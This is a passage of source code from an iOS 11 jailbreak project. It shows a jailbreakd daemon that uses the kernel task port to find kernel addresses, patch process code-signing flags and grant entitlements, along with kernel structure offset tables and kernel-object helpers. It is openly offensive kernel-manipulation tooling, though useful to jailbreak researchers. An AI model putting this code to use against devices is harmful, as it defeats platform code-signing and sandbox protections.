 60 |     pid = atoi([[userInfo objectForKey:@"pid"] UTF8String]);
 61 |     NSLog(@"[*] Got request from pid %d\n", pid);
 62 |     char *ent = [[userInfo objectForKey:@"ent"] UTF8String];
 63 |     NSString *val = [userInfo objectForKey:@"value"];
 64 |     BOOL valb;
 65 |     if ([val isEqualToString:@"true"]) valb = true;
 66 |     else if ([val isEqualToString:@"false"]) valb = false;
 67 |     else  {
 68 |         fprintf(stderr, "Error, entitlement value not a boolean\n");
 69 |         return 0;
 70 |     }
 71 |     entitlePid(pid, ent, valb);
 72 |     return 0;
 73 | }
 74 | - (NSDictionary *)setcsflags:(NSString *)name message:(NSDictionary *)userInfo {
 75 |     pid = atoi([[userInfo objectForKey:@"pid"] UTF8String]);
 76 |     NSLog(@"[*] Got request from pid %d\n", pid);
 77 |     setcsflags(pid);
 78 |     return 0;
 79 | }
 80 | @end
 81 | 
 82 | kern_return_t init_tfp0() {
 83 |     fprintf(stdout, "[*] Initializing jailbreakd\n");
 84 |     
 85 |     kern_return_t ret = host_get_special_port(mach_host_self(), HOST_LOCAL_NODE, 4, &tfp0);
 86 |     
 87 |     if (ret != KERN_SUCCESS) {
 88 |         fprintf(stderr,"[*] ERROR: host_get_special_port 4: %s\n", mach_error_string(err));
 89 |         return -1;
 90 |     }
 91 |     NSLog(@"[*] Got tfp0!\n");
 92 |     
 93 |     kernel_base = strtoull(getenv("KernelBase"), NULL, 16);
 94 |     kernel_slide = kernel_base - 0xFFFFFFF007004000;
 95 |     NSLog(@"[*] kaslr slide: 0x%016llx\n", kernel_slide);
 96 |     
 97 |     init_jelbrek(tfp0, kernel_base);
 98 |     
 99 |     return ret;
100 | }
101 | 
102 | 
103 | int main(int argc, char **argv, char **envp) {
104 |     remove_memory_limit(); //Electra's jailbreakd does this and since I don't wanna run into trouble with memory I'm doing it too
105 |     offsets_init();
106 |     init_tfp0();
107 |     
108 |     //cache addresses
109 |     find_allproc();
110 |     find_add_x0_x0_0x40_ret();
111 |     find_OSBoolean_True();
112 |     find_OSBoolean_False();
113 |     find_zone_map_ref();
114 |     find_osunserializexml();
115 |     find_smalloc();
116 |     init_kexecute();
117 |     
118 |     term_kernel();
119 | 
120 | 
121 |     [[Listener alloc] init]; //allocate a new listener and start listening!
122 | 	return 0;
123 | }
124 | 
125 | // vim:ft=objc
126 | 


--------------------------------------------------------------------------------
/multi_path/jailbreakd/make.sh:
--------------------------------------------------------------------------------
1 | make clean && make && cp .theos/obj/debug/jailbreakd jailbreakd
2 | ldid -Sent.xml jailbreakd
3 | 


--------------------------------------------------------------------------------
/multi_path/jailbreakd/offsetof.c:
--------------------------------------------------------------------------------
 1 | unsigned offsetof_p_pid = 0x10;               // proc_t::p_pid
 2 | unsigned offsetof_task = 0x18;                // proc_t::task
 3 | unsigned offsetof_p_uid = 0x30;               // proc_t::p_uid
 4 | unsigned offsetof_p_gid = 0x34;               // proc_t::p_uid
 5 | unsigned offsetof_p_ruid = 0x38;              // proc_t::p_uid
 6 | unsigned offsetof_p_rgid = 0x3c;              // proc_t::p_uid
 7 | unsigned offsetof_p_ucred = 0x100;            // proc_t::p_ucred
 8 | unsigned offsetof_p_csflags = 0x2a8;          // proc_t::p_csflags
 9 | unsigned offsetof_itk_self = 0xD8;            // task_t::itk_self (convert_task_to_port)
10 | unsigned offsetof_itk_sself = 0xE8;           // task_t::itk_sself (task_get_special_port)
11 | unsigned offsetof_itk_bootstrap = 0x2b8;      // task_t::itk_bootstrap (task_get_special_port)
12 | unsigned offsetof_itk_space = 0x308;          // task_t::itk_space
13 | unsigned offsetof_ip_mscount = 0x9C;          // ipc_port_t::ip_mscount (ipc_port_make_send)
14 | unsigned offsetof_ip_srights = 0xA0;          // ipc_port_t::ip_srights (ipc_port_make_send)
15 | unsigned offsetof_ip_kobject = 0x68;          // ipc_port_t::ip_kobject
16 | unsigned offsetof_p_textvp = 0x248;           // proc_t::p_textvp
17 | unsigned offsetof_p_textoff = 0x250;          // proc_t::p_textoff
18 | unsigned offsetof_p_cputype = 0x2c0;          // proc_t::p_cputype
19 | unsigned offsetof_p_cpu_subtype = 0x2c4;      // proc_t::p_cpu_subtype
20 | unsigned offsetof_special = 2 * sizeof(long); // host::special
21 | unsigned offsetof_ipc_space_is_table = 0x20;  // ipc_space::is_table?..
22 | 
23 | unsigned offsetof_ucred_cr_uid = 0x18;        // ucred::cr_uid
24 | unsigned offsetof_ucred_cr_ruid = 0x1c;       // ucred::cr_ruid
25 | unsigned offsetof_ucred_cr_svuid = 0x20;      // ucred::cr_svuid
26 | unsigned offsetof_ucred_cr_ngroups = 0x24;    // ucred::cr_ngroups
27 | unsigned offsetof_ucred_cr_groups = 0x28;     // ucred::cr_groups
28 | unsigned offsetof_ucred_cr_rgid = 0x68;       // ucred::cr_rgid
29 | unsigned offsetof_ucred_cr_svgid = 0x6c;      // ucred::cr_svgid
30 | 
31 | unsigned offsetof_v_type = 0x70;              // vnode::v_type
32 | unsigned offsetof_v_id = 0x74;                // vnode::v_id
33 | unsigned offsetof_v_ubcinfo = 0x78;           // vnode::v_ubcinfo
34 | 
35 | unsigned offsetof_ubcinfo_csblobs = 0x50;     // ubc_info::csblobs
36 | 
37 | unsigned offsetof_csb_cputype = 0x8;          // cs_blob::csb_cputype
38 | unsigned offsetof_csb_flags = 0x12;           // cs_blob::csb_flags
39 | unsigned offsetof_csb_base_offset = 0x16;     // cs_blob::csb_base_offset
40 | unsigned offsetof_csb_entitlements_offset = 0x98; // cs_blob::csb_entitlements
41 | unsigned offsetof_csb_signer_type = 0xA0;     // cs_blob::csb_signer_type
42 | unsigned offsetof_csb_platform_binary = 0xA4; // cs_blob::csb_platform_binary
43 | unsigned offsetof_csb_platform_path = 0xA8;   // cs_blob::csb_platform_path
44 | 
45 | unsigned offsetof_t_flags = 0x3a0; // task::t_flags
46 | 
47 | unsigned offsetof_v_mount = 0xd8;             // vnode::v_mount
48 | unsigned offsetof_v_specinfo = 0x78;          // vnode::v_specinfo
49 | unsigned offsetof_specflags = 0x10;
50 | unsigned offsetof_mnt_flag = 0x70;            // mount::mnt_flag
51 | unsigned offsetof_mnt_data = 0x8f8;           // mount::mnt_data
52 | 
53 | 


--------------------------------------------------------------------------------
/multi_path/jailbreakd/offsetof.h:
--------------------------------------------------------------------------------
 1 | 
 2 | extern unsigned offsetof_p_pid;
 3 | extern unsigned offsetof_task;
 4 | extern unsigned offsetof_p_uid;
 5 | extern unsigned offsetof_p_gid;
 6 | extern unsigned offsetof_p_ruid;
 7 | extern unsigned offsetof_p_rgid;
 8 | extern unsigned offsetof_p_ucred;
 9 | extern unsigned offsetof_p_csflags;
10 | extern unsigned offsetof_itk_self;
11 | extern unsigned offsetof_itk_sself;
12 | extern unsigned offsetof_itk_bootstrap;
13 | extern unsigned offsetof_itk_space;
14 | extern unsigned offsetof_ip_mscount;
15 | extern unsigned offsetof_ip_srights;
16 | extern unsigned offsetof_ip_kobject;
17 | extern unsigned offsetof_p_textvp;
18 | extern unsigned offsetof_p_textoff;
19 | extern unsigned offsetof_p_cputype;
20 | extern unsigned offsetof_p_cpu_subtype;
21 | extern unsigned offsetof_special;
22 | extern unsigned offsetof_ipc_space_is_table;
23 | 
24 | extern unsigned offsetof_ucred_cr_uid;
25 | extern unsigned offsetof_ucred_cr_ruid;
26 | extern unsigned offsetof_ucred_cr_gid;
27 | extern unsigned offsetof_ucred_cr_rgid;
28 | extern unsigned offsetof_ucred_cr_svgid;
29 | extern unsigned offsetof_ucred_cr_groups;
30 | extern unsigned offsetof_ucred_cr_ngroups;
31 | extern unsigned offsetof_ucred_cr_svuid;
32 | 
33 | extern unsigned offsetof_v_type;
34 | extern unsigned offsetof_v_id;
35 | extern unsigned offsetof_v_ubcinfo;
36 | 
37 | extern unsigned offsetof_ubcinfo_csblobs;
38 | 
39 | extern unsigned offsetof_csb_cputype;
40 | extern unsigned offsetof_csb_flags;
41 | extern unsigned offsetof_csb_base_offset;
42 | extern unsigned offsetof_csb_entitlements_offset;
43 | extern unsigned offsetof_csb_signer_type;
44 | extern unsigned offsetof_csb_platform_binary;
45 | extern unsigned offsetof_csb_platform_path;
46 | 
47 | extern unsigned offsetof_t_flags;
48 | 
49 | extern unsigned offsetof_v_mount;
50 | extern unsigned offsetof_v_specinfo;
51 | extern unsigned offsetof_specflags;
52 | extern unsigned offsetof_mnt_flag;
53 | extern unsigned offsetof_mnt_data;
54 | 
55 | #define	CS_VALID		0x0000001	/* dynamically valid */
56 | #define CS_ADHOC		0x0000002	/* ad hoc signed */
57 | #define CS_GET_TASK_ALLOW	0x0000004	/* has get-task-allow entitlement */
58 | #define CS_INSTALLER		0x0000008	/* has installer entitlement */
59 | 
60 | #define	CS_HARD			0x0000100	/* don't load invalid pages */
61 | #define	CS_KILL			0x0000200	/* kill process if it becomes invalid */
62 | #define CS_CHECK_EXPIRATION	0x0000400	/* force expiration checking */
63 | #define CS_RESTRICT		0x0000800	/* tell dyld to treat restricted */
64 | #define CS_ENFORCEMENT		0x0001000	/* require enforcement */
65 | #define CS_REQUIRE_LV		0x0002000	/* require library validation */
66 | #define CS_ENTITLEMENTS_VALIDATED	0x0004000
67 | 
68 | #define	CS_ALLOWED_MACHO	0x00ffffe
69 | 
70 | #define CS_EXEC_SET_HARD	0x0100000	/* set CS_HARD on any exec'ed process */
71 | #define CS_EXEC_SET_KILL	0x0200000	/* set CS_KILL on any exec'ed process */
72 | #define CS_EXEC_SET_ENFORCEMENT	0x0400000	/* set CS_ENFORCEMENT on any exec'ed process */
73 | #define CS_EXEC_SET_INSTALLER	0x0800000	/* set CS_INSTALLER on any exec'ed process */
74 | 
75 | #define CS_KILLED		0x1000000	/* was killed by kernel for invalidity */
76 | #define CS_DYLD_PLATFORM	0x2000000	/* dyld used to load this is a platform binary */
77 | #define CS_PLATFORM_BINARY	0x4000000	/* this is a platform binary */
78 | #define CS_PLATFORM_PATH	0x8000000	/* platform binary by the fact of path (osx only) */
79 | 
80 | #define CS_DEBUGGED         0x10000000  /* process is currently or has previously been debugged and allowed to run with invalid pages */
81 | #define CS_SIGNED         0x20000000  /* process has a signature (may have gone invalid) */
82 | #define CS_DEV_CODE         0x40000000  /* code is dev signed, cannot be loaded into prod signed code (will go away with rdar://problem/28322552) */
83 | 
84 | 


--------------------------------------------------------------------------------
/multi_path/jailbreakd/offsets.h:
--------------------------------------------------------------------------------
 1 | #ifndef offsets_h
 2 | #define offsets_h
 3 | 
 4 | enum kstruct_offset {
 5 |   /* struct task */
 6 |   KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE,
 7 |   KSTRUCT_OFFSET_TASK_REF_COUNT,
 8 |   KSTRUCT_OFFSET_TASK_ACTIVE,
 9 |   KSTRUCT_OFFSET_TASK_VM_MAP,
10 |   KSTRUCT_OFFSET_TASK_NEXT,
11 |   KSTRUCT_OFFSET_TASK_PREV,
12 |   KSTRUCT_OFFSET_TASK_ITK_SPACE,
13 |   KSTRUCT_OFFSET_TASK_BSD_INFO,
14 |   
15 |   /* struct ipc_port */
16 |   KSTRUCT_OFFSET_IPC_PORT_IO_BITS,
17 |   KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES,
18 |   KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE,
19 |   KSTRUCT_OFFSET_IPC_PORT_MSG_COUNT,
20 |   KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER,
21 |   KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT,
22 |   KSTRUCT_OFFSET_IPC_PORT_IP_PREMSG,
23 |   KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT,
24 |   KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS,
25 |   
26 |   /* struct proc */
27 |   KSTRUCT_OFFSET_PROC_PID,
28 |   KSTRUCT_OFFSET_PROC_P_FD,
29 |   
30 |   /* struct filedesc */
31 |   KSTRUCT_OFFSET_FILEDESC_FD_OFILES,
32 |   
33 |   /* struct fileproc */
34 |   KSTRUCT_OFFSET_FILEPROC_F_FGLOB,
35 |   
36 |   /* struct fileglob */
37 |   KSTRUCT_OFFSET_FILEGLOB_FG_DATA,
38 |   
39 |   /* struct socket */
40 |   KSTRUCT_OFFSET_SOCKET_SO_PCB,
41 |   
42 |   /* struct pipe */
43 |   KSTRUCT_OFFSET_PIPE_BUFFER,
44 |   
45 |   /* struct ipc_space */
46 |   KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE_SIZE,
47 |   KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE,
48 |   
49 |   KFREE_ADDR_OFFSET,
50 | };
51 | 
52 | int koffset(enum kstruct_offset offset);
53 | void offsets_init(void);
54 | 
55 | #endif
56 | 


--------------------------------------------------------------------------------
/multi_path/jailbreakd/offsets.m:
--------------------------------------------------------------------------------
  1 | #import <Foundation/Foundation.h>
  2 | 
  3 | #include <stdio.h>
  4 | #include <stdlib.h>
  5 | #include <string.h>
  6 | #include <sys/sysctl.h>
  7 | #include <sys/utsname.h>
  8 | 
  9 | #include "offsets.h"
 10 | 
 11 | int* offsets = NULL;
 12 | 
 13 | int kstruct_offsets_11_0[] = {
 14 |   0xb,   // KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE,
 15 |   0x10,  // KSTRUCT_OFFSET_TASK_REF_COUNT,
 16 |   0x14,  // KSTRUCT_OFFSET_TASK_ACTIVE,
 17 |   0x20,  // KSTRUCT_OFFSET_TASK_VM_MAP,
 18 |   0x28,  // KSTRUCT_OFFSET_TASK_NEXT,
 19 |   0x30,  // KSTRUCT_OFFSET_TASK_PREV,
 20 |   0x308, // KSTRUCT_OFFSET_TASK_ITK_SPACE
 21 |   0x368, // KSTRUCT_OFFSET_TASK_BSD_INFO,
 22 |   
 23 |   0x0,   // KSTRUCT_OFFSET_IPC_PORT_IO_BITS,
 24 |   0x4,   // KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES,
 25 |   0x40,  // KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE,
 26 |   0x50,  // KSTRUCT_OFFSET_IPC_PORT_MSG_COUNT,
 27 |   0x60,  // KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER,
 28 |   0x68,  // KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT,
 29 |   0x88,  // KSTRUCT_OFFSET_IPC_PORT_IP_PREMSG,
 30 |   0x90,  // KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT,
 31 |   0xa0,  // KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS,
 32 |   
 33 |   0x10,  // KSTRUCT_OFFSET_PROC_PID,
 34 |   0x108, // KSTRUCT_OFFSET_PROC_P_FD
 35 |   
 36 |   0x0,   // KSTRUCT_OFFSET_FILEDESC_FD_OFILES
 37 |   
 38 |   0x8,   // KSTRUCT_OFFSET_FILEPROC_F_FGLOB
 39 |   
 40 |   0x38,  // KSTRUCT_OFFSET_FILEGLOB_FG_DATA
 41 |   
 42 |   0x10,  // KSTRUCT_OFFSET_SOCKET_SO_PCB
 43 |   
 44 |   0x10,  // KSTRUCT_OFFSET_PIPE_BUFFER
 45 |   
 46 |   0x14,  // KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE_SIZE
 47 |   0x20,  // KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE
 48 |   
 49 |   0x6c,  // KFREE_ADDR_OFFSET
 50 | };
 51 | 
 52 | int kstruct_offsets_11_3[] = {
 53 |   0xb,   // KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE,
 54 |   0x10,  // KSTRUCT_OFFSET_TASK_REF_COUNT,
 55 |   0x14,  // KSTRUCT_OFFSET_TASK_ACTIVE,
 56 |   0x20,  // KSTRUCT_OFFSET_TASK_VM_MAP,
 57 |   0x28,  // KSTRUCT_OFFSET_TASK_NEXT,
 58 |   0x30,  // KSTRUCT_OFFSET_TASK_PREV,
 59 |   0x308, // KSTRUCT_OFFSET_TASK_ITK_SPACE
 60 |   0x368, // KSTRUCT_OFFSET_TASK_BSD_INFO,
 61 |   
 62 |   0x0,   // KSTRUCT_OFFSET_IPC_PORT_IO_BITS,
 63 |   0x4,   // KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES,
 64 |   0x40,  // KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE,
 65 |   0x50,  // KSTRUCT_OFFSET_IPC_PORT_MSG_COUNT,
 66 |   0x60,  // KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER,
 67 |   0x68,  // KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT,
 68 |   0x88,  // KSTRUCT_OFFSET_IPC_PORT_IP_PREMSG,
 69 |   0x90,  // KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT,
 70 |   0xa0,  // KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS,
 71 |   
 72 |   0x10,  // KSTRUCT_OFFSET_PROC_PID,
 73 |   0x108, // KSTRUCT_OFFSET_PROC_P_FD
 74 |   
 75 |   0x0,   // KSTRUCT_OFFSET_FILEDESC_FD_OFILES
 76 |   
 77 |   0x8,   // KSTRUCT_OFFSET_FILEPROC_F_FGLOB
 78 |   
 79 |   0x38,  // KSTRUCT_OFFSET_FILEGLOB_FG_DATA
 80 |   
 81 |   0x10,  // KSTRUCT_OFFSET_SOCKET_SO_PCB
 82 |   
 83 |   0x10,  // KSTRUCT_OFFSET_PIPE_BUFFER
 84 |   
 85 |   0x14,  // KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE_SIZE
 86 |   0x20,  // KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE
 87 |   
 88 |   0x7c,  // KFREE_ADDR_OFFSET
 89 | };
 90 | 
 91 | int koffset(enum kstruct_offset offset) {
 92 |   if (offsets == NULL) {
 93 |     printf("need to call offsets_init() prior to querying offsets\n");
 94 |     return 0;
 95 |   }
 96 |   return offsets[offset];
 97 | }
 98 | 
 99 | 
100 | void offsets_init() {
101 |  /* if (@available(iOS 11.4, *)) {
102 |     printf("this bug is patched in iOS 11.4 and above\n");
103 |     exit(EXIT_FAILURE);
104 |   } else if (@available(iOS 11.3, *)) {
105 |     printf("offsets selected for iOS 11.3 or above\n");
106 |     offsets = kstruct_offsets_11_3;
107 |   } else if (@available(iOS 11.0, *)) {
108 |     printf("offsets selected for iOS 11.0 to 11.2.6\n");
109 |     offsets = kstruct_offsets_11_0;
110 |   } else {
111 |     printf("iOS version too low, 11.0 required\n");
112 |     exit(EXIT_FAILURE);
113 |   }*/
114 | offsets = kstruct_offsets_11_3;
115 | }
116 | 


--------------------------------------------------------------------------------
/multi_path/jailbreakd/osobject.c:
--------------------------------------------------------------------------------
  1 | #include <stdlib.h>
  2 | #include "kexecute.h"
  3 | #include "kern_utils.h"
  4 | #include "patchfinder64.h"
  5 | #include "osobject.h"
  6 | 
  7 | // offsets in vtable:
  8 | static uint32_t off_OSDictionary_SetObjectWithCharP = sizeof(void*) * 0x1F;
  9 | static uint32_t off_OSDictionary_GetObjectWithCharP = sizeof(void*) * 0x26;
 10 | static uint32_t off_OSDictionary_Merge              = sizeof(void*) * 0x23;
 11 | 
 12 | static uint32_t off_OSArray_Merge                   = sizeof(void*) * 0x1E;
 13 | static uint32_t off_OSArray_RemoveObject            = sizeof(void*) * 0x20;
 14 | static uint32_t off_OSArray_GetObject               = sizeof(void*) * 0x22;
 15 | 
 16 | static uint32_t off_OSObject_Release                = sizeof(void*) * 0x05;
 17 | static uint32_t off_OSObject_GetRetainCount         = sizeof(void*) * 0x03;
 18 | static uint32_t off_OSObject_Retain                 = sizeof(void*) * 0x04;
 19 | 
 20 | static uint32_t off_OSString_GetLength              = sizeof(void*) * 0x11;
 21 | 
 22 | // 1 on success, 0 on error
 23 | int OSDictionary_SetItem(uint64_t dict, const char *key, uint64_t val) {
 24 |     size_t len = strlen(key) + 1;
 25 |     
 26 |     uint64_t ks = kalloc(len);
 27 |     kwrite(ks, key, len);
 28 |     
 29 |     uint64_t vtab = kread64(dict);
 30 |     uint64_t f = kread64(vtab + off_OSDictionary_SetObjectWithCharP);
 31 |     
 32 |     int rv = (int) kexecute(f, dict, ks, val, 0, 0, 0, 0);
 33 |     
 34 |     kfree(ks, len);
 35 |     
 36 |     return rv;
 37 | }
 38 | 
 39 | // XXX it can return 0 in lower 32 bits but still be valid
 40 | // fix addr of returned value and check if kread64 gives ptr
 41 | // to vtable addr saved before
 42 | 
 43 | // address if exists, 0 if not
 44 | uint64_t _OSDictionary_GetItem(uint64_t dict, const char *key) {
 45 |     size_t len = strlen(key) + 1;
 46 |     
 47 |     uint64_t ks = kalloc(len);
 48 |     kwrite(ks, key, len);
 49 |     
 50 |     uint64_t vtab = kread64(dict);
 51 |     uint64_t f = kread64(vtab + off_OSDictionary_GetObjectWithCharP);
 52 |     
 53 |     int rv = (int) kexecute(f, dict, ks, 0, 0, 0, 0, 0);
 54 |     
 55 |     kfree(ks, len);
 56 |     
 57 |     return rv;
 58 | }
 59 | 
 60 | uint64_t OSDictionary_GetItem(uint64_t dict, const char *key) {
 61 |     uint64_t ret = _OSDictionary_GetItem(dict, key);
 62 |     
 63 |     if (ret != 0) {
 64 |         // XXX can it be not in zalloc?..
 65 |         ret = zm_fix_addr(ret);
 66 |     }
 67 |     
 68 |     return ret;
 69 | }
 70 | 
 71 | // 1 on success, 0 on error
 72 | int OSDictionary_Merge(uint64_t dict, uint64_t aDict) {
 73 |     uint64_t vtab = kread64(dict);
 74 |     uint64_t f = kread64(vtab + off_OSDictionary_Merge);
 75 |     
 76 |     return (int) kexecute(f, dict, aDict, 0, 0, 0, 0, 0);
 77 | }
 78 | 
 79 | // 1 on success, 0 on error
 80 | int OSArray_Merge(uint64_t array, uint64_t aArray) {
 81 |     uint64_t vtab = kread64(array);
 82 |     uint64_t f = kread64(vtab + off_OSArray_Merge);
 83 |     
 84 |     return (int) kexecute(f, array, aArray, 0, 0, 0, 0, 0);
 85 | }
 86 | 
 87 | uint64_t _OSArray_GetObject(uint64_t array, unsigned int idx){
 88 |     uint64_t vtab = kread64(array);
 89 |     uint64_t f = kread64(vtab + off_OSArray_GetObject);
 90 |     
 91 |     return kexecute(f, array, idx, 0, 0, 0, 0, 0);
 92 | }
 93 | 
 94 | uint64_t OSArray_GetObject(uint64_t array, unsigned int idx){
 95 |     uint64_t ret = _OSArray_GetObject(array, idx);
 96 |     
 97 |     if (ret != 0){
 98 |         // XXX can it be not in zalloc?..
 99 |         ret = zm_fix_addr(ret);
100 |     }
101 |     return ret;
102 | }
103 | 
104 | void OSArray_RemoveObject(uint64_t array, unsigned int idx){
105 |     uint64_t vtab = kread64(array);
106 |     uint64_t f = kread64(vtab + off_OSArray_RemoveObject);
107 |     
108 |     (void)kexecute(f, array, idx, 0, 0, 0, 0, 0);
109 | }
110 | 
111 | // XXX error handling just for fun? :)
112 | uint64_t _OSUnserializeXML(const char* buffer) {
113 |     size_t len = strlen(buffer) + 1;
114 |     
115 |     uint64_t ks = kalloc(len);
116 |     kwrite(ks, buffer, len);
117 |     
118 |     uint64_t errorptr = 0;
119 |     
120 |     uint64_t rv = kexecute(find_osunserializexml(), ks, errorptr, 0, 0, 0, 0, 0);
121 |     kfree(ks, len);
122 |     
123 |     return rv;
124 | }
125 | 
126 | uint64_t OSUnserializeXML(const char* buffer) {
127 |     uint64_t ret = _OSUnserializeXML(buffer);
128 |     
129 |     if (ret != 0) {
130 |         // XXX can it be not in zalloc?..
131 |         ret = zm_fix_addr(ret);
132 |     }
133 |     
134 |     return ret;
135 | }
136 | 
137 | void OSObject_Release(uint64_t osobject) {
138 |     uint64_t vtab = kread64(osobject);
139 |     uint64_t f = kread64(vtab + off_OSObject_Release);
140 |     (void) kexecute(f, osobject, 0, 0, 0, 0, 0, 0);
141 | }
142 | 
143 | void OSObject_Retain(uint64_t osobject) {
144 |     uint64_t vtab = kread64(osobject);
145 |     uint64_t f = kread64(vtab + off_OSObject_Release);
146 |     (void) kexecute(f, osobject, 0, 0, 0, 0, 0, 0);
147 | }
148 | 
149 | uint32_t OSObject_GetRetainCount(uint64_t osobject) {
150 |     uint64_t vtab = kread64(osobject);
151 |     uint64_t f = kread64(vtab + off_OSObject_Release);
152 |     return (uint32_t) kexecute(f, osobject, 0, 0, 0, 0, 0, 0);
153 | }
154 | 
155 | unsigned int OSString_GetLength(uint64_t osstring){
156 |     uint64_t vtab = kread64(osstring);
157 |     uint64_t f = kread64(vtab + off_OSString_GetLength);
158 |     return (unsigned int)kexecute(f, osstring, 0, 0, 0, 0, 0, 0);
159 | }
160 | 
161 | char *OSString_CopyString(uint64_t osstring){
162 |     unsigned int length = OSString_GetLength(osstring);
163 |     char *str = malloc(length + 1);
164 |     str[length] = 0;
165 |     
166 |     kread(OSString_CStringPtr(osstring), str, length);
167 |     return str;
168 | }
169 | 


--------------------------------------------------------------------------------
/multi_path/jailbreakd/osobject.h:
--------------------------------------------------------------------------------
 1 | #define OSDictionary_ItemCount(dict) kread32(dict+20)
 2 | #define OSDictionary_ItemBuffer(dict) kread64(dict+32)
 3 | #define OSDictionary_ItemKey(buffer, idx) kread64(buffer+16*idx)
 4 | #define OSDictionary_ItemValue(buffer, idx) kread64(buffer+16*idx+8)
 5 | #define OSString_CStringPtr(str) kread64(str + 0x10)
 6 | #define OSArray_ItemCount(arr) kread32(arr+0x14)
 7 | #define OSArray_ItemBuffer(arr) kread64(arr+32)
 8 | 
 9 | // see osobject.c for info
10 | 
11 | int OSDictionary_SetItem(uint64_t dict, const char *key, uint64_t val);
12 | uint64_t OSDictionary_GetItem(uint64_t dict, const char *key);
13 | int OSDictionary_Merge(uint64_t dict, uint64_t aDict);
14 | void OSArray_RemoveObject(uint64_t array, unsigned int idx);
15 | uint64_t OSArray_GetObject(uint64_t array, unsigned int idx);
16 | int OSArray_Merge(uint64_t array, uint64_t aArray);
17 | uint64_t OSUnserializeXML(const char* buffer);
18 | 
19 | void OSObject_Release(uint64_t osobject);
20 | void OSObject_Retain(uint64_t osobject);
21 | uint32_t OSObject_GetRetainCount(uint64_t osobject);
22 | 
23 | unsigned int OSString_GetLength(uint64_t osstring);
24 | char *OSString_CopyString(uint64_t osstring);
25 | 


--------------------------------------------------------------------------------
/multi_path/jailbreakd/patchfinder64.h:
--------------------------------------------------------------------------------
 1 | #ifndef PATCHFINDER64_H_
 2 | #define PATCHFINDER64_H_
 3 | 
 4 | #define CACHED_FIND(type, name) \
 5 | type __##name(void);\
 6 | type name(void) { \
 7 | static type cached = 0; \
 8 | if (cached == 0) { \
 9 | cached = __##name(); \
10 | } \
11 | return cached; \
12 | } \
13 | type __##name(void)
14 | 
15 | int init_kernel(uint64_t base, const char *filename);
16 | void term_kernel(void);
17 | 
18 | // Fun part
19 | uint64_t find_allproc(void);
20 | uint64_t find_add_x0_x0_0x40_ret(void);
21 | uint64_t find_OSBoolean_True(void);
22 | uint64_t find_OSBoolean_False(void);
23 | uint64_t find_zone_map_ref(void);
24 | uint64_t find_osunserializexml(void);
25 | uint64_t find_smalloc(void);
26 | 
27 | #endif
28 | 


--------------------------------------------------------------------------------
/multi_path/jelbrek/include/IOKit/OSMessageNotification.h:
--------------------------------------------------------------------------------
  1 | /*
  2 |  * Copyright (c) 1998-2000 Apple Computer, Inc. All rights reserved.
  3 |  *
  4 |  * @APPLE_LICENSE_HEADER_START@
  5 |  * 
  6 |  * This file contains Original Code and/or Modifications of Original Code
  7 |  * as defined in and that are subject to the Apple Public Source License
  8 |  * Version 2.0 (the 'License'). You may not use this file except in
  9 |  * compliance with the License. Please obtain a copy of the License at
 10 |  * http://www.opensource.apple.com/apsl/ and read it before using this
 11 |  * file.
 12 |  * 
 13 |  * The Original Code and all software distributed under the License are
 14 |  * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
 15 |  * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
 16 |  * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
 17 |  * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
 18 |  * Please see the License for the specific language governing rights and
 19 |  * limitations under the License.
 20 |  * 
 21 |  * @APPLE_LICENSE_HEADER_END@
 22 |  */
 23 | /*
 24 |  * Copyright (c) 1999 Apple Computer, Inc.  All rights reserved. 
 25 |  *
 26 |  * HISTORY
 27 |  *
 28 |  */
 29 | 
 30 | #ifndef	__OS_OSMESSAGENOTIFICATION_H
 31 | #define __OS_OSMESSAGENOTIFICATION_H
 32 | 
 33 | #ifdef __cplusplus
 34 | extern "C" {
 35 | #endif
 36 | 
 37 | #include <mach/mach_types.h>
 38 | #include "IOReturn.h"
 39 | 
 40 | enum {
 41 |     kFirstIOKitNotificationType 		= 100,
 42 |     kIOServicePublishNotificationType 		= 100,
 43 |     kIOServiceMatchedNotificationType		= 101,
 44 |     kIOServiceTerminatedNotificationType	= 102,
 45 |     kIOAsyncCompletionNotificationType		= 150,
 46 |     kIOServiceMessageNotificationType		= 160,
 47 |     kLastIOKitNotificationType 			= 199
 48 | };
 49 | 
 50 | enum {
 51 |     kOSNotificationMessageID		= 53,
 52 |     kOSAsyncCompleteMessageID		= 57,
 53 |     kMaxAsyncArgs			= 16
 54 | };
 55 | 
 56 | enum {
 57 |     kIOAsyncReservedIndex 	= 0,
 58 |     kIOAsyncReservedCount,
 59 | 
 60 |     kIOAsyncCalloutFuncIndex 	= kIOAsyncReservedCount,
 61 |     kIOAsyncCalloutRefconIndex,
 62 |     kIOAsyncCalloutCount,
 63 | 
 64 |     kIOMatchingCalloutFuncIndex	= kIOAsyncReservedCount,
 65 |     kIOMatchingCalloutRefconIndex,
 66 |     kIOMatchingCalloutCount,
